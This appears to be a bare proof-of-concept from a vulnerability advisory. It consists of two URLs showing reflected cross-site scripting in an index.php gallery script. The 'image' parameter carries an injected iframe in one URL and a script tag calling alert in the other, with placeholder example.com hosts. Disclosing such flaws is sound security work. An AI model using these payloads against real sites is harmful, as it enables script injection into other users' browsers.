http://www.example.com/images/index.php?gallery=[gallery name]&image=<iframe%20src="http://www.example.com"> http://www.example.com/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>